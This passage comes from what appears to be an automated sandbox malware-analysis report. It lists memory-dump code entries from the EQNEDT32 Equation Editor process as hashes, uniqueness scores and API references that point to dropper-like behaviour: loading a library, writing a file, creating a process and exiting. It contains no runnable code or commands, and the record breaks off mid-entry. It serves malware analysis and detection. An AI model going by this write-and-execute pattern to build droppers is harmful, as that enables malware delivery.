                                          • Opcode ID: 5aa79df4ebd134425b0418eafa11f0fbb2d9ba4dc7a1d245d1fbef9500bf2495
                                          • Instruction ID: 6d7866130785b13b1bad01a52c9699810a23bbdd0ab81435140c00c9910668e6
                                          • Opcode Fuzzy Hash: 5aa79df4ebd134425b0418eafa11f0fbb2d9ba4dc7a1d245d1fbef9500bf2495
                                          • Instruction Fuzzy Hash: B141BD2044D3C16FEB22E7249D5AB69BF747F83600F2889CFE1854F0F3E66566059316
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79d030c691eb325257c525efe830e11a8053abe78c6dd291c469d14947359298
                                          • Instruction ID: eedfb0e384fa8637a9b082288643451426452245d52ec022297043aa513ab469
                                          • Opcode Fuzzy Hash: 79d030c691eb325257c525efe830e11a8053abe78c6dd291c469d14947359298
                                          • Instruction Fuzzy Hash: 5831B76040C3C2AFEF11DB649D45B6ABF79BFC2600F188D8FF0854B0F2E66596188766
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 2333f2cf7e3f74b253a55daf2f7288a82eead362f6b8a443f8e6401fdf3756e6
                                          • Instruction ID: 1ec8dddffbc93c831abbb176eb9385f3b9b8736b04afa0108b1e5af2e6c189a3
                                          • Opcode Fuzzy Hash: 2333f2cf7e3f74b253a55daf2f7288a82eead362f6b8a443f8e6401fdf3756e6
                                          • Instruction Fuzzy Hash: C541AC6540D3C08FFF11D6607E9A665BF64BB07600F5E8DDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 7921c0718d071efa976133d24f1f59b1b54f69aa326bd927ce4ffa730d741742
                                          • Instruction ID: 94baacee84cc4ac44abad4b370b5c075a6b25cbb003d8863d5f6c918d884ee8d
                                          • Opcode Fuzzy Hash: 7921c0718d071efa976133d24f1f59b1b54f69aa326bd927ce4ffa730d741742
                                          • Instruction Fuzzy Hash: 3B41BD6540D3C08FFF11D6607E9A665BF64BB07600F4E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: acfa80daeba94050e1de8608a8266b282a85768ad6ee74b4ce4577969f5755a6
                                          • Instruction ID: 930af8d2f761e7c62b9ef89d28a0940016e0e4ae8ee6d21ebe3f53fecfc13c32
                                          • Opcode Fuzzy Hash: acfa80daeba94050e1de8608a8266b282a85768ad6ee74b4ce4577969f5755a6
                                          • Instruction Fuzzy Hash: 7041BD6540D7C08FFF11DA607E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 649e7a15633f4f10f5ba12daf6af4e744826f324c769b2532a6e37fb9c6b7ab3
                                          • Instruction ID: e3f57dc06ac6349629015dcc8768b46289ccc8602a2490951c919d9f970d08b8
                                          • Opcode Fuzzy Hash: 649e7a15633f4f10f5ba12daf6af4e744826f324c769b2532a6e37fb9c6b7ab3
                                          • Instruction Fuzzy Hash: D941AC6540D3C08FFF11D6207E9A665BFA4BB07600F4E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: e6e8548bcab6edb1107d54827f7a615732fc8966f76e471011d4f9d5f63d8f6d
                                          • Instruction ID: d380cf2f11568b7c4807ae9e7e827971bfc8f1477372b00396a4bbb744b17fa6
                                          • Opcode Fuzzy Hash: e6e8548bcab6edb1107d54827f7a615732fc8966f76e471011d4f9d5f63d8f6d
                                          • Instruction Fuzzy Hash: 1341BD6540D3C08FFF11D6607E9A665BF64BB07600F4D8DDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 3496ffe8af0ac140084e12d844f511c1fd9efc793bbe1b1c7c620673a3c7437e
                                          • Instruction ID: e0d96a2b4e32e90660900f401247d9c75e2ced32ce587e3b10bec37551c8bb84
                                          • Opcode Fuzzy Hash: 3496ffe8af0ac140084e12d844f511c1fd9efc793bbe1b1c7c620673a3c7437e
                                          • Instruction Fuzzy Hash: FD41BD6540D3C08FFF11D6607E9A665BF64BB07600F4D8DDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 6cb95ba97b179244f8e338a3df6daf6f8434967f7e2830d87b26c29a4736d7c8
                                          • Instruction ID: e4e00f39ba3ab8b2b4ffad8c11264fcfad6e62a8b7f43fd1a1977f54791143c8
                                          • Opcode Fuzzy Hash: 6cb95ba97b179244f8e338a3df6daf6f8434967f7e2830d87b26c29a4736d7c8
                                          • Instruction Fuzzy Hash: 4741CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 90e07c19572a4093e8df1e130215d4e5336916121f95f59d79cb96360901a8ab
                                          • Instruction ID: a8911cc4ce47d41a362e1e57e5c86a23894e3f67f82988c0956d231be04d1247
                                          • Opcode Fuzzy Hash: 90e07c19572a4093e8df1e130215d4e5336916121f95f59d79cb96360901a8ab
                                          • Instruction Fuzzy Hash: D641CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8EDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: c657b6e9f4091d1da4aa1c6035261f50145361ddf97d506de7459008a47ef813
                                          • Instruction ID: f4f7ef80dadab465d737b36a4345e5eacb0cf5099b123e778c3dcd18abb16415
                                          • Opcode Fuzzy Hash: c657b6e9f4091d1da4aa1c6035261f50145361ddf97d506de7459008a47ef813
                                          • Instruction Fuzzy Hash: D141CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: e638b376a4487c6a456ac93ce7437f9ab05b91c7dc568658768a8336c8d4ef95
                                          • Instruction ID: 00d3b0db23017e55b1816f423c2d2b83f7cec9d2c6e4eb560329ebdd7cc0c8d8
                                          • Opcode Fuzzy Hash: e638b376a4487c6a456ac93ce7437f9ab05b91c7dc568658768a8336c8d4ef95
                                          • Instruction Fuzzy Hash: 6441CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 59186500a37ffdea3106a67061b4928d13116d92195edc25f051790e969310fe
                                          • Instruction ID: 735ae54b85f1d9fb5f00725b90f251d1cb3a6fda3cda7e5095df7b6ca41178e7
                                          • Opcode Fuzzy Hash: 59186500a37ffdea3106a67061b4928d13116d92195edc25f051790e969310fe
                                          • Instruction Fuzzy Hash: B731BF6580D3C19FFF12D6606E9A665BF64BB07600F5D8ECBC5824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 212ef4689f40aa0bdb2ca3633087669991d14be32b53d127883c670fa1975699
                                          • Instruction ID: 7043e066b1b45c99cc660e3fd4e0898490a6879a1037c653b567d7bf63fd6507
                                          • Opcode Fuzzy Hash: 212ef4689f40aa0bdb2ca3633087669991d14be32b53d127883c670fa1975699
                                          • Instruction Fuzzy Hash: 9E31B06580D7C19FFB12D6606E9A655BF64BB07600F1D8ECB85814F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 9f935678533a7fc563786887b11b06fae92a430cedc7808c7377b26c17a0e726
                                          • Instruction ID: dbfe2595f57b0755fb5ee6266c551a154e30cb59d7409b5fe33f4bc09fc91217
                                          • Opcode Fuzzy Hash: 9f935678533a7fc563786887b11b06fae92a430cedc7808c7377b26c17a0e726
                                          • Instruction Fuzzy Hash: 1C31CE6580D3C09FFB12D6206E9A665BF64BB47600F1D8DCBC5C24F1F3D295A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 1b4b9441acc08caf761ef301c24d4a30e1d5ca95ee8f11c21f17188573157e1c
                                          • Instruction ID: 2b538192b9a0f69273c90754b10529df227546ac861e270fffa4e50b9760d756
                                          • Opcode Fuzzy Hash: 1b4b9441acc08caf761ef301c24d4a30e1d5ca95ee8f11c21f17188573157e1c
                                          • Instruction Fuzzy Hash: 7C31AD2044D3C16EEB12E7749D5AB29BF74BF83600F2849CFE1850F1F3E6555605D226
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 0ae92c29ef0a25f1bf9087bc24aa28e788412c4fd332ae4b4e819cc3fd7ef51e
                                          • Instruction ID: 52685983ec44e0c95444c539aa6de855cca76404b35a8147ceccbc59460cc405
                                          • Opcode Fuzzy Hash: 0ae92c29ef0a25f1bf9087bc24aa28e788412c4fd332ae4b4e819cc3fd7ef51e
                                          • Instruction Fuzzy Hash: 9D31DF6580D3C09FFB12D6206E9A665BF64BB07600F1D8DCBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 55acb1b902b0c2166eea14e2029fc259b18eef6c303f7bb2acbecb7e59dedaa2
                                          • Instruction ID: 7b0fc199e259731e4ea5e034d0331676001c626d6133840e8e5ea4ea9a66e780
                                          • Opcode Fuzzy Hash: 55acb1b902b0c2166eea14e2029fc259b18eef6c303f7bb2acbecb7e59dedaa2
                                          • Instruction Fuzzy Hash: EB31DF6580D7C09FFB12D6206E9A665BF64BB07600F1D8DCBC5C14F0F3D295A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: ef6f9140ac6238ac56ed7b6ac70911d04ca3142cb48f054132b6858b10d7b247
                                          • Instruction ID: 248cb8675d5dc7a3c88337d4db3de740c7be1e08b4fbc703a52faecbd1beae5b
                                          • Opcode Fuzzy Hash: ef6f9140ac6238ac56ed7b6ac70911d04ca3142cb48f054132b6858b10d7b247
                                          • Instruction Fuzzy Hash: 8231DF6580D3C09FFB12D6206E9A664BF64BB07600F1D8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 199e981767e0aee37e3fe7ccecb914fa137e76f32f63c26eb680ad58761b6a19
                                          • Instruction ID: c4939bfccbcbebef59e7b6f89b6cdc1336d573317d79b371b5cdcc84b5287986
                                          • Opcode Fuzzy Hash: 199e981767e0aee37e3fe7ccecb914fa137e76f32f63c26eb680ad58761b6a19
                                          • Instruction Fuzzy Hash: FD31DF6580D3C09FFB12D6206E9A664BF64BB07600F1D8DCBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: b5ebf514a3d50d5c65955edf55e34017b02ac87603f3386316b87d23451cc866
                                          • Instruction ID: 25d42e1b3f781b3b258fe31878f34ea5df2d797d33b419e896dbcb57790cfa38
                                          • Opcode Fuzzy Hash: b5ebf514a3d50d5c65955edf55e34017b02ac87603f3386316b87d23451cc866
                                          • Instruction Fuzzy Hash: F131E06580D3C09FFB12D6206E9A664BF64BB07600F1D8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 0ed5f57f1a058cad450d11ad69cd670b5e552a24301b11f5cb68ad49e90c367e
                                          • Instruction ID: 42dba688c80a67fb9f66016fc2d2d9b24a9695a981596428eb66cb2f07b7a2fc
                                          • Opcode Fuzzy Hash: 0ed5f57f1a058cad450d11ad69cd670b5e552a24301b11f5cb68ad49e90c367e
                                          • Instruction Fuzzy Hash: 5C31CE6140D7C09FFB12D6606E6A664BF64BB47600F1D8ECBC5C18F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 6fc1aee10ef0beeb26e6830feceba3cc663a012cc8923075439bfe3be43ae505
                                          • Instruction ID: 9fa9a679714fc62e22f2116ae964d90dfa717d8d9b1a63b29e4c7c64e3173fba
                                          • Opcode Fuzzy Hash: 6fc1aee10ef0beeb26e6830feceba3cc663a012cc8923075439bfe3be43ae505
                                          • Instruction Fuzzy Hash: B031CE6140D7C09FFB12D6606E5A654BF64BB47600F1C8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 390481a77dce610bdc78fdc9070a67b85d40d85b7fd72e0738d4425a05b579cb
                                          • Instruction ID: b0d6b62efb10d4cc1f12b5a84c9f83a5dd743bc10a2f8526b6005bc1eee8e2e4
                                          • Opcode Fuzzy Hash: 390481a77dce610bdc78fdc9070a67b85d40d85b7fd72e0738d4425a05b579cb
                                          • Instruction Fuzzy Hash: 9931CE6140D7C09FFB12D6606E6A664BF64BB47600F1D8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: e1f3b97d9b5a4b1bf2b4b4a8a0256526f0700a2ca264c020793356f696cb1b82
                                          • Instruction ID: 1afe0ff8adbbd95869816f8bf1da211f904f92f2c64902c226fc1e7bf2a22288
                                          • Opcode Fuzzy Hash: e1f3b97d9b5a4b1bf2b4b4a8a0256526f0700a2ca264c020793356f696cb1b82
                                          • Instruction Fuzzy Hash: 1D31BA6180D7C05FEB12D6606E9A654BFA4BB47600F1C8ECBC5C18F1F3D295A24AA363
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: abce51639879b1add4e184ed6421d2e3f0526ae8d7c41856b8e6acfdaa59c4eb
                                          • Instruction ID: bf4fe2c5897293687d27742984d00135495dbc048170354c5a47fb2db2a67e06
                                          • Opcode Fuzzy Hash: abce51639879b1add4e184ed6421d2e3f0526ae8d7c41856b8e6acfdaa59c4eb
                                          • Instruction Fuzzy Hash: 9A31CB6180D7C05FEB12D7606E9A654BFA4BB47600F1C8ACBC5C18F1F3D295A24AA362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eaac63aff88d3c417234ed25a3e1838bd2e4566b77137129547aeefebf4bda82
                                          • Instruction ID: 984ac3f7b70664e614b27d382451b1bd0affcbf3bab17b8fc82311c1621a91fb
                                          • Opcode Fuzzy Hash: eaac63aff88d3c417234ed25a3e1838bd2e4566b77137129547aeefebf4bda82
                                          • Instruction Fuzzy Hash: 5F31EE6180D7C05FEB12D7606E9A654BFB4BF47600F1C8ACBC5C18F0F3D294A24AA362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b17d2fad3d765ad7a786674fa01c2ee303013370c0b64e93081400e756861086
                                          • Instruction ID: 984ac3f7b70664e614b27d382451b1bd0affcbf3bab17b8fc82311c1621a91fb
                                          • Opcode Fuzzy Hash: b17d2fad3d765ad7a786674fa01c2ee303013370c0b64e93081400e756861086
                                          • Instruction Fuzzy Hash: 5F31EE6180D7C05FEB12D7606E9A654BFB4BF47600F1C8ACBC5C18F0F3D294A24AA362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
                                          • Instruction ID: 78443260761a63aaadae894342f79e7f19bab4046f039b3aa804836c33100d07
                                          • Opcode Fuzzy Hash: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
                                          • Instruction Fuzzy Hash: BB2183B1408386AAEF11EB54ED41E6FBBB9FFC1B00F148D4EB185460B2E671D6088665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2cbc8d8d16dec18aa5c0f836d39b11ca0171ac973cc76324eeeff81c0030aeae
                                          • Instruction ID: 986c30f45316d04bbd114ed316d3e06d1d565fe5d12f5628a00b517eb555a4d9
                                          • Opcode Fuzzy Hash: 2cbc8d8d16dec18aa5c0f836d39b11ca0171ac973cc76324eeeff81c0030aeae
                                          • Instruction Fuzzy Hash: 5E21BA6544D7C15FFB21D7702D9AB55BEA4BB8A600F1D8ECB81C18F1F3D298A10A9316
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 9558ff419d245c8c08bfc850e0b888f05bf2b329ec43985635aef6d0d55f1aff
                                          • Instruction ID: 172df861c447ddf52dcfe2784370bf1248c20eae3f2d2fd0e0d4b89d653e1daf
                                          • Opcode Fuzzy Hash: 9558ff419d245c8c08bfc850e0b888f05bf2b329ec43985635aef6d0d55f1aff
                                          • Instruction Fuzzy Hash: 0411EEA544C7C14FFB21D6302D9AB84BE60BB8A600F0D8ECB95C58F1F3D294A10A9352
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
                                          • Instruction ID: a311dd5db77c0966ff43d82d7be804f5055500e0fc02a14acb07c76575cb12ce
                                          • Opcode Fuzzy Hash: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
                                          • Instruction Fuzzy Hash: 04115EB0408346BEEB11EA54DD41FAFBBB9FFC0B00F148D1EB195460B1EB7199088A66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 833f1fdb2df954a47779238e40c14f53762179b8aaffb34f45396806a607e277
                                          • Instruction ID: 0a5d2b7db1a6786a61ecb81ebbe788058218701cf0e883138a6c3ad0f673893f
